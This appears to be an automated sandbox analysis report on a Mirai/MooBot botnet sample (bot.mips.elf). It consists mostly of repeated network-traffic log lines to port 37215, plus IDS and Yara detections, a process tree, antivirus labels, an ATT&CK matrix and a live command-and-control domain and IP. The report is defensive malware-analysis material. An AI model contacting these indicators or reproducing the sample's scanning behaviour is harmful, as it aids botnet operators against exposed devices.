                Source: unknownNetwork traffic detected: HTTP traffic on port 44276 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53096 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55972 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 43860 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 36414 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 52264 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 41432 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 52742 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 52690 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60986 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 54498 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 38100 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 36192 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 59750 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 54178 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 34860 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35574 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 40782 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 47604 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46818 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51262 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56960 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 44934 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45666 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45466 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 41380 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56608 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 42316 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46350 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48772 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 33754 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35574 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 54068 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45264 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 34124 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 42088 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35888 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35094 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48334 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 52876 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53190 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 43254 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 40236 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39106 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 42308 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55984 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 44342 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55614 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 52818 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39644 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35244 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48916 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55154 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46632 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 43530 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39526 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 38364 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39540 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 42658 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 58548 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 38188 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37340 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 47860 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57066 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57576 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55520 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60890 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39456 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 38786 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46408 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57004 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39532 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 34438 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57140 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50728 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 40980 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 41942 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 43172 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60316 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50828 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39962 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45824 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 34796 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 58910 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 52722 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 44422 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 49192 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45950 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56320 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50718 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39054 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 59162 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55386 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39554 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 42362 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46316 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46144 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46890 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48628 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 32930 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39388 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 33968 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 40016 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 36044 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60288 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39830 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 34506 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 33446 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37632 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 41386 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 42510 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 54614 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56878 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 52194 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60276 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48374 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50228 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 47168 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 36886 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 59128 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 41296 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60994 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 58548 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35048 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 54292 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55934 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60722 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 49576 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 59794 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50374 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48580 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55016 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50294 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 54904 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 47302 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 43460 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51670 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51348 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35414 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 54882 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48484 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 34468 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 44146 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39212 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 59990 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60716 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 42462 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51362 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39662 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50590 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45962 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 36636 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56224 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35674 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53628 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 41150 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45338 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46688 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48664 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50674 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56290 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46222 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55774 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39322 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 58852 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53174 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56678 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 34734 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57634 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51440 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 42744 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 41704 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45992 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56568 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48486 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60076 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 40186 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46430 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 33168 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 54778 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 54326 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37280 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 49202 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 40638 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53650 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 38150 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48334 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46018 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 43690 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 58246 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48306 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39314 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 34940 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48876 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 33974 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 42994 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 58528 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53096 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39180 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46838 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45112 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57272 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 34798 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 59754 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60046 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 42652 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 44468 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50724 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 49016 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60032 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48698 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 34062 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35788 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 38784 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56614 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37688 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56742 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 36572 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56770 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37264 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 44716 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 36638 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56002 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 52610 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57156 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55858 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 44812 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 41666 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48460 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46822 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 38174 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 40134 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 42864 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39960 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 49208 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53616 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 41596 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51686 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39884 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51722 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 58394 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 42448 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 41654 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 38378 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 40098 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 36988 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 52668 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 47580 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 49140 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 33400 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 44662 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 58346 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 47782 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57724 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55876 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 52092 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 38138 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37768 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53036 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 54086 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60370 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 49148 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46870 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 49564 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48750 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 44916 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46306 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 49534 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45618 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 59138 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 38878 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57234 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 54534 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45118 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 34836 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48608 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60516 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 36448 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39690 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50492 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37648 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56000 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50954 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46034 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37888 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 40070 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37502 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 58358 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56430 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60284 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53774 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 44044 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 44408 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 42642 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 58948 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57106 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 41708 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35168 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48482 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 42880 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 49058 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51156 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 41914 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 54258 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 49102 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 58500 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35412 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35002 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50306 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45542 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 34758 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55108 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 59126 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55990 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 44466 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57650 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35158 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46822 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57050 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 59164 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 47240 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48142 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48956 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51524 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60318 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45738 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56814 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55104 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60054 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 54810 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 34338 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 33156 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 40472 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 33968 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 41490 -> 37215
                Source: /tmp/bot.mips.elf (PID: 5426)Queries kernel information via 'uname': Jump to behavior
                Source: bot.mips.elf, 5426.1.00007fff47d81000.00007fff47da2000.rw-.sdmpBinary or memory string: n5x86_64/usr/bin/qemu-mips/tmp/bot.mips.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/bot.mips.elf
                Source: bot.mips.elf, 5426.1.0000560b5fd7e000.0000560b5fe05000.rw-.sdmpBinary or memory string: V!/etc/qemu-binfmt/mips
                Source: bot.mips.elf, 5426.1.0000560b5fd7e000.0000560b5fe05000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mips
                Source: bot.mips.elf, 5426.1.00007fff47d81000.00007fff47da2000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mips

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: bot.mips.elf, type: SAMPLE
                Source: Yara matchFile source: 5426.1.00007fa458400000.00007fa458427000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: bot.mips.elf PID: 5426, type: MEMORYSTR
                Source: Yara matchFile source: bot.mips.elf, type: SAMPLE
                Source: Yara matchFile source: 5426.1.00007fa458400000.00007fa458427000.r-x.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                Source: Yara matchFile source: bot.mips.elf, type: SAMPLE
                Source: Yara matchFile source: 5426.1.00007fa458400000.00007fa458427000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: bot.mips.elf PID: 5426, type: MEMORYSTR
                Source: Yara matchFile source: bot.mips.elf, type: SAMPLE
                Source: Yara matchFile source: 5426.1.00007fa458400000.00007fa458427000.r-x.sdmp, type: MEMORY
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting
                Valid AccountsWindows Management Instrumentation1
                Scripting
                Path Interception2
                File and Directory Permissions Modification
                1
                OS Credential Dumping
                11
                Security Software Discovery
                Remote ServicesData from Local System11
                Non-Standard Port
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                File Deletion
                LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
                Non-Application Layer Protocol
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
                Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                No configs have been found
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Number of created Files
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1448925 Sample: bot.mips.elf Startdate: 29/05/2024 Architecture: LINUX Score: 100 26 ok.ditmemost.click 2->26 28 197.152.229.150 airtel-tz-asTZ Tanzania United Republic of 2->28 30 99 other IPs or domains 2->30 32 Snort IDS alert for network traffic 2->32 34 Malicious sample detected (through community Yara rule) 2->34 36 Antivirus / Scanner detection for submitted sample 2->36 38 6 other signatures 2->38 8 bot.mips.elf 2->8         started        signatures3 process4 process5 10 bot.mips.elf sh 8->10         started        12 bot.mips.elf 8->12         started        process6 14 sh rm 10->14         started        16 sh mkdir 10->16         started        18 sh mv 10->18         started        20 sh chmod 10->20         started        22 bot.mips.elf 12->22         started        24 bot.mips.elf 12->24         started       
                SourceDetectionScannerLabelLink
                bot.mips.elf75%ReversingLabsLinux.Trojan.Mirai
                bot.mips.elf100%AviraEXP/ELF.Mirai.Z.A
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                ok.ditmemost.click
                94.156.66.70
                truetrue
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://schemas.xmlsoap.org/soap/encoding/bot.mips.elffalse
                  • URL Reputation: safe
                  unknown
                  http://schemas.xmlsoap.org/soap/envelope/bot.mips.elffalse
                  • URL Reputation: safe
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
